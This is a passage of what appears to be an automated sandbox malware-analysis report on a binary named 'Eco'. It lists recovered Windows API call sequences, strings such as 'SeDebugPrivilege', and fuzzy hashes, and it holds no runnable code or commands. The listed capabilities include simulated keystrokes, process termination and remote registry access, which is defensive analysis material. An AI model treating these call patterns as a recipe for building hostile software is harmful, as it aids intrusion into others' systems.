                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                          • Instruction ID: c59fd93413e0996ca141de5c5ac26f9ebd5bea2cfc220c17857b3f1a346d06cf
                          • Opcode Fuzzy Hash: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                          • Instruction Fuzzy Hash: 5A41D8705447C9EEFF308664A8043B5BEE17B16344F08E459D6CD561C2EBA45DC8A7A2
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • CoInitialize.OLE32 ref: 005888B5
                          • CoUninitialize.OLE32 ref: 005888C0
                          • CoCreateInstance.OLE32(?,00000000,00000017,005A3BBC,?), ref: 00588920
                          • IIDFromString.OLE32(?,?), ref: 00588993
                          • VariantInit.OLEAUT32(?), ref: 00588A2D
                          • VariantClear.OLEAUT32(?), ref: 00588A8E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: d544067c20d072866a1d55498a50fb792c87ec068171088d5b97232de04765ed
                          • Instruction ID: d815419122a185c5b92dd1311880596d1568956855037f1dff04ef75821f91fa
                          • Opcode Fuzzy Hash: d544067c20d072866a1d55498a50fb792c87ec068171088d5b97232de04765ed
                          • Instruction Fuzzy Hash: 16616B70608702AFD711EF54D849B7ABBE8FF89714F404809F985AB291DB70ED48DB92
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B980
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057B9F6
                          • GetLastError.KERNEL32 ref: 0057BA00
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0057BA6D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: fb443d3f33ca68a5f566e20a1732acc63e49e16a8d90a49cd9e258488aa6d466
                          • Instruction ID: 63e34c2fa91608d1b0985a3bb2cb840d584553304d29fbf63772d0267ef9b375
                          • Opcode Fuzzy Hash: fb443d3f33ca68a5f566e20a1732acc63e49e16a8d90a49cd9e258488aa6d466
                          • Instruction Fuzzy Hash: 1F318235A00205AFDB00EF64E889FAEBFB4FF55304F108159E80997291EB719D45EB91
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 005733E9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: ,j]0j]$,j]0j]$blank$info$question$stop$warning
                          • API String ID: 2457776203-1862109651
                          • Opcode ID: 6f43b1fb13a607c71af60f4c15db777e0b027f1da6ec9c97dd31fa790b07a66a
                          • Instruction ID: 0eaf4ffa644ca4c0ffc6920f0281144f562a6ce0abfcdc1b71c00d612fa2a807
                          • Opcode Fuzzy Hash: 6f43b1fb13a607c71af60f4c15db777e0b027f1da6ec9c97dd31fa790b07a66a
                          • Instruction Fuzzy Hash: 6411383134870BFEEB254A54BC4ADAA7F9CFF15330F10805AF508A61C2DAB59B40B264
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005699AF
                          • GetDlgCtrlID.USER32 ref: 005699BA
                          • GetParent.USER32 ref: 005699D6
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 005699D9
                          • GetDlgCtrlID.USER32(?), ref: 005699E2
                          • GetParent.USER32(?), ref: 005699FE
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569A01
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1536045017-1403004172
                          • Opcode ID: b654c5e2fe8c4c35af4ffbea0c1ab25bdf5893b32145512676537b200043af2a
                          • Instruction ID: 49b1e6c01f47eb6944cd80c460a0036b1b1095382d11a09baacfcd68ccbbb191
                          • Opcode Fuzzy Hash: b654c5e2fe8c4c35af4ffbea0c1ab25bdf5893b32145512676537b200043af2a
                          • Instruction Fuzzy Hash: 4921B074A00205AFDF04ABA0CC99EFEBFA9FFA6300F100116F961932D1DB754929DA60
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00569A98
                          • GetDlgCtrlID.USER32 ref: 00569AA3
                          • GetParent.USER32 ref: 00569ABF
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569AC2
                          • GetDlgCtrlID.USER32(?), ref: 00569ACB
                          • GetParent.USER32(?), ref: 00569AE7
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569AEA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1536045017-1403004172
                          APIs
                          • GetParent.USER32 ref: 00569B0A
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00569B1F
                          • _wcscmp.LIBCMT ref: 00569B31
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569BAC
                          Strings
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00588D89
                          • CoInitialize.OLE32(00000000), ref: 00588DB6
                          • CoUninitialize.OLE32 ref: 00588DC0
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00588EC0
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00588FED
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A3BDC), ref: 00589021
                          • CoGetObject.OLE32(?,00000000,005A3BDC,?), ref: 00589044
                          • SetErrorMode.KERNEL32(00000000), ref: 00589057
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005890D7
                          • VariantClear.OLEAUT32(?), ref: 005890E7
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0057185B
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005708D3,?,00000001), ref: 0057186F
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00571876
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 00571885
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00571897
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 005718B0
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 005718C2
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 00571907
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 0057191C
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 00571927
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          APIs
                          • GetSysColor.USER32(00000008), ref: 0051260D
                          • SetTextColor.GDI32(?,000000FF), ref: 00512617
                          • SetBkMode.GDI32(?,00000001), ref: 0051262C
                          • GetStockObject.GDI32(00000005), ref: 00512634
                          • GetClientRect.USER32(?), ref: 0054C02C
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0054C043
                          • GetWindowDC.USER32(?), ref: 0054C04F
                          • GetPixel.GDI32(00000000,?,?), ref: 0054C05E
                          • ReleaseDC.USER32(?,00000000), ref: 0054C070
                          • GetSysColor.USER32(00000005), ref: 0054C08E
                          Similarity
                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                          • String ID:
                          • API String ID: 3430376129-0
                          APIs
                          • EnumChildWindows.USER32(?,0056AF1D), ref: 0056AE5B
                          Strings
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 0051327E
                            • Part of subcall function 0051218F: GetClientRect.USER32(?,?), ref: 005121B8
                            • Part of subcall function 0051218F: GetWindowRect.USER32(?,?), ref: 005121F9
                            • Part of subcall function 0051218F: ScreenToClient.USER32(?,?), ref: 00512221
                          • GetDC.USER32 ref: 0054CFA3
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054CFB6
                          • SelectObject.GDI32(00000000,00000000), ref: 0054CFC4
                          • SelectObject.GDI32(00000000,00000000), ref: 0054CFD9
                          • ReleaseDC.USER32(?,00000000), ref: 0054CFE1
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054D06C
                          Strings
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,005A0980), ref: 005891DA
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005A0980), ref: 0058920E
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00589388
                          • SysFreeString.OLEAUT32(?), ref: 005893B2
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          APIs
                          • _memset.LIBCMT ref: 0058FB66
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FCF9
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD1D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD5D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD7F
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0058FEFB
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0058FF2D
                          • CloseHandle.KERNEL32(?), ref: 0058FF5C
                          • CloseHandle.KERNEL32(?), ref: 0058FFD3
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          APIs
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005739F7,?), ref: 00574A4D
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005739F7,?), ref: 00574A66
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • lstrcmpiW.KERNEL32(?,?), ref: 00575168
                          • _wcscmp.LIBCMT ref: 00575182
                          • MoveFileW.KERNEL32(?,?), ref: 0057519D
                          Similarity
                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 793581249-0
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00598AEC
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C568
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C58A
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C5A2
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C5C0
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C5E1
                          • DestroyIcon.USER32(00000000), ref: 0054C5F0
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C60D
                          • DestroyIcon.USER32(?), ref: 0054C61C
                            • Part of subcall function 0059A89C: DeleteObject.GDI32(00000000), ref: 0059A8D5
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                          • String ID:
                          • API String ID: 2819616528-0
                          APIs
                            • Part of subcall function 0056B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056B330
                            • Part of subcall function 0056B310: GetCurrentThreadId.KERNEL32 ref: 0056B337
                            • Part of subcall function 0056B310: AttachThreadInput.USER32(00000000,?,0056A01E,?,00000001), ref: 0056B33E
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A029
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0056A046
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0056A049
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A052
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0056A070
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A073
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A07C
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0056A093
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A096
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00568F3D,00000B00,?,?), ref: 005692C5
                          • HeapAlloc.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 005692CC
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00568F3D,00000B00,?,?), ref: 005692E1
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00568F3D,00000B00,?,?), ref: 005692E9
                          • DuplicateHandle.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 005692EC
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00568F3D,00000B00,?,?), ref: 005692FC
                          • GetCurrentProcess.KERNEL32(00568F3D,00000000,?,00568F3D,00000B00,?,?), ref: 00569304
                          • DuplicateHandle.KERNEL32(00000000,?,00568F3D,00000B00,?,?), ref: 00569307
                          • CreateThread.KERNEL32(00000000,00000000,0056932D,00000000,00000000,00000000), ref: 00569321
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: b2bb40900cacba4e48bf2afc414c80cd4b237ebb16e26f3c85a31468bd472707
                          • Instruction ID: 5ef7e3373f6aac6a695cb8b9e7c7d2fd1374999903a940dd62b147c7b2f20df6
                          • Opcode Fuzzy Hash: b2bb40900cacba4e48bf2afc414c80cd4b237ebb16e26f3c85a31468bd472707
                          • Instruction Fuzzy Hash: 3A919C70A0021AABDF24DFA5C848FAEBBB8FF46710F148559F915AB280D7709944CFA0
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00597211
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00597225
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0059723F
                          • _wcscat.LIBCMT ref: 0059729A
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 005972B1
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005972DF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          • API String ID: 307300125-78025650
                          • Opcode ID: f17d807846afa198c4982409e4ab88935f5ee382305384b44368cfe2e27bc177
                          • Instruction ID: d257044e233fa7b5cd0fc44c9b236d58112087d5e01326f45744206ac66a1f6c
                          • Opcode Fuzzy Hash: f17d807846afa198c4982409e4ab88935f5ee382305384b44368cfe2e27bc177
                          • Instruction Fuzzy Hash: B9419134A14308AFEF21DFA4CC89BEE7BA9FF48354F10082AF584A7191D7719D889B50
                          APIs
                            • Part of subcall function 00573FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00573FDA
                            • Part of subcall function 00573FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
                            • Part of subcall function 00573FB5: FindCloseChangeNotification.KERNEL32(00000000), ref: 005740B2
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE55
                          • GetLastError.KERNEL32 ref: 0058EE68
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE97
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0058EF14
                          • GetLastError.KERNEL32(00000000), ref: 0058EF1F
                          • CloseHandle.KERNEL32(00000000), ref: 0058EF54
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 1701285019-2896544425
                          • Opcode ID: 8361664141d7fa8b0a091de4b5f1eaa291e9fb5c0b0f8dcec75430c2948feb93
                          • Instruction ID: 86d6fb1c90a00584bb4f62e343837ddea50e0ce2f748001bcae4671b1cd9b889
                          • Opcode Fuzzy Hash: 8361664141d7fa8b0a091de4b5f1eaa291e9fb5c0b0f8dcec75430c2948feb93
                          • Instruction Fuzzy Hash: A9419D712042029FDB15EF24EC9AF6DBBA5BF81314F048419F9066B2D2CB75A848DF91
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057466F
                          • LoadStringW.USER32(00000000), ref: 00574676
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057468C
                          • LoadStringW.USER32(00000000), ref: 00574693
                          • _wprintf.LIBCMT ref: 005746B9
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005746D7
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 005746B4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: 4bb4cd1fdf43a95d476d3cf671dbef2585695f2de291194517f6ae9cb997b6e4
                          • Instruction ID: c4641319ea5be291ee17deb02ce4c8516c384df9c3d54111ef530f041bbb1f64
                          • Opcode Fuzzy Hash: 4bb4cd1fdf43a95d476d3cf671dbef2585695f2de291194517f6ae9cb997b6e4
                          • Instruction Fuzzy Hash: AD0186F69503087FE711AB909D89EF77B6CE74A300F004595B749D3081EA745E889F70
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetSystemMetrics.USER32(0000000F), ref: 0059D89F
                          • GetSystemMetrics.USER32(0000000F), ref: 0059D8BF
                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059DAFA
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059DB18
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059DB39
                          • ShowWindow.USER32(00000003,00000000), ref: 0059DB58
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0059DB7D
                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0059DBA0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                          • String ID:
                          • API String ID: 1211466189-0
                          • Opcode ID: 4138b7020d44c40bc83eb5664c11ce996d1246f2f8e2ff9b8028fbbdeebbb9e4
                          • Instruction ID: 82a7ee48b390bfa0ad9eb80e5c537b246c964624baaf0ae78543ef92b5b5078a
                          • Opcode Fuzzy Hash: 4138b7020d44c40bc83eb5664c11ce996d1246f2f8e2ff9b8028fbbdeebbb9e4
                          • Instruction Fuzzy Hash: 25B1AA31600219EFDF14CF68C9857BE7BB2FF08711F09816AED489B299D734A994DB60
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590216
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3479070676-0
                          • Opcode ID: d3bebbadc258faf3f5baf65f53fa973c6ae15a10bbd1fdf81409567ec7a8650a
